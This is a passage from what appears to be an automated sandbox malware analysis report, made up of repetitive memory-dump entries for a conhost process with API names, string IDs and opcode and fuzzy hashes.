                                                            109: 7ffd348f3f02-7ffd34910482  GetFileAttributesW  -> 113, 114
                                                            113: 7ffd34910484  -> 114
                                                            114: 7ffd3491048a-7ffd349104a6
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348e1000_conhost.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAz4
                                                            • API String ID: 0-4208471536

                                                            Control-flow Graph

                                                            • Control-flow graph not reproduced; the function at 7ffd348f3f62-7ffd3490f002 calls CloseHandle
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348e1000_conhost.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348c0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348d3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348d3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348c0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348d3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11e056fb4fb5e6d6fc24ea291c655dc23caa95c9ea321e29ba8c4f7168ca7c7b
                                                            • Instruction ID: cb9b82ab8e08f84d338478256f75fb2a07825cb790c0bbaa5b11cf1abb4f1ae3
                                                            • Opcode Fuzzy Hash: 11e056fb4fb5e6d6fc24ea291c655dc23caa95c9ea321e29ba8c4f7168ca7c7b
                                                            • Instruction Fuzzy Hash: C1711331B0E5594FE7E8DA5888B61BC37D0EF46310B1402BADA9EC75B2DE1CAC06D781
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6bc1e935d40c780262fb71eafc006ab92e59d1347c0262730b79848f64936427
                                                            • Instruction ID: 294d5495422a39271e0b783ed0879e8f7b4a4481fe63e826039952b5e5e5cb19
                                                            • Opcode Fuzzy Hash: 6bc1e935d40c780262fb71eafc006ab92e59d1347c0262730b79848f64936427
                                                            • Instruction Fuzzy Hash: 7B91B231B095468FEB99CF18C4F56B97BA1FF46300F1445BAC58ACB29ACA3CE845DB41
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd58ca6c2bf74741e4d38e9dee5f345b54a2bd1e46932d3c7bd8a5c83862cd6b
                                                            • Instruction ID: 56c56fdab5e9f562ad002fcce8324a56a058871ddd073d657c97c03404b9ff9f
                                                            • Opcode Fuzzy Hash: dd58ca6c2bf74741e4d38e9dee5f345b54a2bd1e46932d3c7bd8a5c83862cd6b
                                                            • Instruction Fuzzy Hash: FD717D30E1D54A8EEBA5DBA884A56FCBBB1FF4A300F54057AD10ED7191DE2C6841EB44
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bd00bfeb508a99df2f8d73854d15f99fc52bc5ad1227eaee8c992aa48322c0cc
                                                            • Instruction ID: 8f70c8ef3d1e5c7b41e8161e9cf47b9bcf0b84ef72d1818a579907da2b689134
                                                            • Opcode Fuzzy Hash: bd00bfeb508a99df2f8d73854d15f99fc52bc5ad1227eaee8c992aa48322c0cc
                                                            • Instruction Fuzzy Hash: 27718230A18A4D8FEBA8DF28D8557ED77E1FB59310F10426EE84DC3291CF78A9558B81
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f894613d37803008817b22ed7991912e7b096b8a9a7a7e5335e987f54f78a80
                                                            • Instruction ID: e8af7746a5f6e30b409922bfe8daf30a6db57f9d75c036619aaf9550a66331ee
                                                            • Opcode Fuzzy Hash: 1f894613d37803008817b22ed7991912e7b096b8a9a7a7e5335e987f54f78a80
                                                            • Instruction Fuzzy Hash: 5D411422B0C5691FE718B7FCA4FA2FA7B91DF86325B0805BBD54DC7193DD68A84182C4
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d4565032e349053b3e3626addaffc83519187b75bb8e43fcc442b632d6007f6
                                                            • Instruction ID: 913cd9e442067acbd58eb61a065cbc8fcfed879f73678aaaf2eea027680df515
                                                            • Opcode Fuzzy Hash: 6d4565032e349053b3e3626addaffc83519187b75bb8e43fcc442b632d6007f6
                                                            • Instruction Fuzzy Hash: CE411322B0C5691FE718B7FC64AA2F97BD1DF86321B08047AE14DC7193DD68A84282C4
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b0b39fdf53382fdc84bf1b3be529c49ef24e56bb919cdfb85d83263b622cce8
                                                            • Instruction ID: 1875c780c9133f07e136661f515e6859df6b173da316f1773dbeb0eae51747e7
                                                            • Opcode Fuzzy Hash: 3b0b39fdf53382fdc84bf1b3be529c49ef24e56bb919cdfb85d83263b622cce8
                                                            • Instruction Fuzzy Hash: 8441A421B598994FFAC8F75884FA6B862D2FB9A314F49057AE50DC32C2DD2CEC419B41
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1765f08d3ad031740002c3bc99a462c0a4ea9d6af17e51fd65627d0b6933ef1
                                                            • Instruction ID: c6ea45aadc60792e826f71c04f1829625bec03924c903fba8156c3cb65b3a988
                                                            • Opcode Fuzzy Hash: e1765f08d3ad031740002c3bc99a462c0a4ea9d6af17e51fd65627d0b6933ef1
                                                            • Instruction Fuzzy Hash: 3841733170C9488FDF98EB18C4A9DA4B3E1FBA9314B14016AD14EC7692DE29F845CB81
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f5a890933e434c22f11d1339ed5bbfc9a9e807a62b4d6d87ca1ec00e95fcc67
                                                            • Instruction ID: 8e2a25bb7cbf13817590f7a1857c56e19c8f3f54d7a208e03e34b945add2bf18
                                                            • Opcode Fuzzy Hash: 5f5a890933e434c22f11d1339ed5bbfc9a9e807a62b4d6d87ca1ec00e95fcc67
                                                            • Instruction Fuzzy Hash: 3E41523170C9498FDF9CEF58D4A5EA4B7E1FBA9310704056AD54EC3292DE25F845CB81
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56b7a61d94bc34ae174d39d2ce28bae1603fd01b53e6bde80a36c6807afe58fd
                                                            • Instruction ID: ee9df2df3c5131c0c3c6fd1db3c4c43c80a3db2dc2ab5a1a4b98de13898de45c
                                                            • Opcode Fuzzy Hash: 56b7a61d94bc34ae174d39d2ce28bae1603fd01b53e6bde80a36c6807afe58fd
                                                            • Instruction Fuzzy Hash: 1131813160C9448FDF9CEF18C4A9DA4B3E1FBA931470505AED04AC7692CE28F885CB81
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 660d2c7fc5f17281a0adba8e16b635cd8a60dca3ecf8dc3787a2a2aac55044ac
                                                            • Instruction ID: d395c2c2a35c7962287d63c352e016dce701dbdae143f07caab7579a445d9904
                                                            • Opcode Fuzzy Hash: 660d2c7fc5f17281a0adba8e16b635cd8a60dca3ecf8dc3787a2a2aac55044ac
                                                            • Instruction Fuzzy Hash: 3F318F31A0C9498FDB9CEF18C4A5EA4B3E1FBA931070406AED54EC7292DE35F841CB81
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f716113a80bacc46cd3ec7191689e84a03185a91a0b9ff58645d172b2018a7d0
                                                            • Instruction ID: ab69825a5906af1d7a751e75a0e5bf4d1722ef43c8de658c6243d3d230d2c70b
                                                            • Opcode Fuzzy Hash: f716113a80bacc46cd3ec7191689e84a03185a91a0b9ff58645d172b2018a7d0
                                                            • Instruction Fuzzy Hash: 8D31D562F1F68646F7E8921858B32BD33C2EB9A351F54057BDA9DC3582EC0C681A52D3
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: e9a9dbf1134489ff64ed3cba917a8358e1fcd4671c08e58730990ba5daa9f485
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: 7321913130C9184FE768EA1CE88ADB977D1EF9A32171501BAE58AC7126E955EC8287C1
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cbf5dfa625fc2a2ec6dce9fd17c76b83aec630d3214558fd246e815ad042261
                                                            • Instruction ID: 979604cd5d12beb9cf0456cdc3aca0155e3b7258fac9a218ad0b229a3e12f417
                                                            • Opcode Fuzzy Hash: 4cbf5dfa625fc2a2ec6dce9fd17c76b83aec630d3214558fd246e815ad042261
                                                            • Instruction Fuzzy Hash: FA316F317089498FDF9CEF18C0A9DA4B3E1FBA9314715056ED04AD7692DE28F885CB81
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7428d20943acbc326b9987cc4b3899221c1c5b9b738773083520cdf894d5f8ce
                                                            • Instruction ID: 457b4321649cbb3932b789e0f9eccb6b2b2267bf5b19e57a233de34ee1643dc5
                                                            • Opcode Fuzzy Hash: 7428d20943acbc326b9987cc4b3899221c1c5b9b738773083520cdf894d5f8ce
                                                            • Instruction Fuzzy Hash: AF313E3560C9498FDB9CEF18C4A5EA4B3E1FBA931070405AED54EC7292DE25F845CB81
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5dcf6d67ad58757a2f8630da14d38af3a49540757725d9f5826c633cafc5b27e
                                                            • Instruction ID: fd5ad5f18a7fadab60ab68026afe444c4324fbebbf056d70de0666ae532f6427
                                                            • Opcode Fuzzy Hash: 5dcf6d67ad58757a2f8630da14d38af3a49540757725d9f5826c633cafc5b27e
                                                            • Instruction Fuzzy Hash: EE31C631B0E9494FDBD8965894A12BC77F1EF8A320F54427ED15EC3687DE2CB8069781
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 017594c0941965c01a9aa64ce4986b800d57665f31e6bb9fc833c87c5b06a3b8
                                                            • Instruction ID: 5c64d07112fe309f6f6eaa75d858ed756b67062cdee9c51197bd4fb807558500
                                                            • Opcode Fuzzy Hash: 017594c0941965c01a9aa64ce4986b800d57665f31e6bb9fc833c87c5b06a3b8
                                                            • Instruction Fuzzy Hash: 1C31C271F0EA4A4FEB989A5994B21BCB7E1FF4A350B14027BD15EC3682CE1C7C029281
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ac8299aa536de08a31421d6f4aab9955eab17a892b0b61fe6e947e2eb81a0ee
                                                            • Instruction ID: 23fd90c65d22df484e2b1de55a7fffc24f75ce4cb4ba7c93c23fdbf25f2f709c
                                                            • Opcode Fuzzy Hash: 5ac8299aa536de08a31421d6f4aab9955eab17a892b0b61fe6e947e2eb81a0ee
                                                            • Instruction Fuzzy Hash: 0F31F931A1A94A8FEBA8DB5488A55BD77B1FF46300F50007BD60ED6591DA3CEA40A781
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 665eb4d5b85d551a8c1460e99163b964e8f9a6597373b4423cf64cf44ea420d8
                                                            • Instruction ID: 8cfddaebafeda0ef4d812d0d76016af3754e06cdd8286af871bd2ab72a1b0033
                                                            • Opcode Fuzzy Hash: 665eb4d5b85d551a8c1460e99163b964e8f9a6597373b4423cf64cf44ea420d8
                                                            • Instruction Fuzzy Hash: 01313071B0990A9FDB88DA58D4A15BCB3A2FF99310B54427AD11ED7686CF28B812D780
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 825fee3256504b126a26f8ce9e7573e8181064abbb3f1cad44ea53b8d879f982
                                                            • Instruction ID: b069780897923e635c8c2200b37cadb5380bbac67bea89cd5a0df075b0a74c54
                                                            • Opcode Fuzzy Hash: 825fee3256504b126a26f8ce9e7573e8181064abbb3f1cad44ea53b8d879f982
                                                            • Instruction Fuzzy Hash: 10311C30A1E56ACFEBE8DB5488E15BD77B0FF46301F50017BD60ED6281DA3CA9A0A741
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f76199cad91336ed4c6596ea4a5038cd6993799d230880f24c13eebc03ab9bd3
                                                            • Instruction ID: 7576e503df4d863be61114b351e301bd5f2f669ca10a6d89107f0f71a574b2be
                                                            • Opcode Fuzzy Hash: f76199cad91336ed4c6596ea4a5038cd6993799d230880f24c13eebc03ab9bd3
                                                            • Instruction Fuzzy Hash: 4E310120F0C91A4FEB94EB2884B67B86291FF5B740F5041B5D64ED7296DEACAC40A781
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9699dd79fb86f1a37b4b014f24025a29234880a5a08460b14553574fa65eeeff
                                                            • Instruction ID: 7a6ee2fe63993b57a3ce0678e030e3d36bf2d6bdb9652c91538593ea643cb2ef
                                                            • Opcode Fuzzy Hash: 9699dd79fb86f1a37b4b014f24025a29234880a5a08460b14553574fa65eeeff
                                                            • Instruction Fuzzy Hash: B931F510A1E5D68BE7AA831454B45B87FA1AF53310B1846FBD18ACF5D7CC1CE885A741
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5cc15ad0868cd368d010f81b00efcc154de48d0fbbd702be5591ca4cba1729f
                                                            • Instruction ID: 678fea2c0fefb15e70ca21e1bc36f3c9ddd77c58ed4631264aa60c56df7d2f92
                                                            • Opcode Fuzzy Hash: f5cc15ad0868cd368d010f81b00efcc154de48d0fbbd702be5591ca4cba1729f
                                                            • Instruction Fuzzy Hash: 4C318631A0C54A8FDB45EB64C8A59B977F0FF5A310F0545BAC00ADB293DE79A945CB80
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3044a8aba920feec32626da456ba3123a975b97ed0872969bdb9546009d3d5bc
                                                            • Instruction ID: 15e179914caa0b970752419da9097f64a813821269c106e83331472778680879
                                                            • Opcode Fuzzy Hash: 3044a8aba920feec32626da456ba3123a975b97ed0872969bdb9546009d3d5bc
                                                            • Instruction Fuzzy Hash: 4921F920B5C9690FF798E76C94EA6B976C2EB9A315B500079E50EC33D2DD6CEC4282C1
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
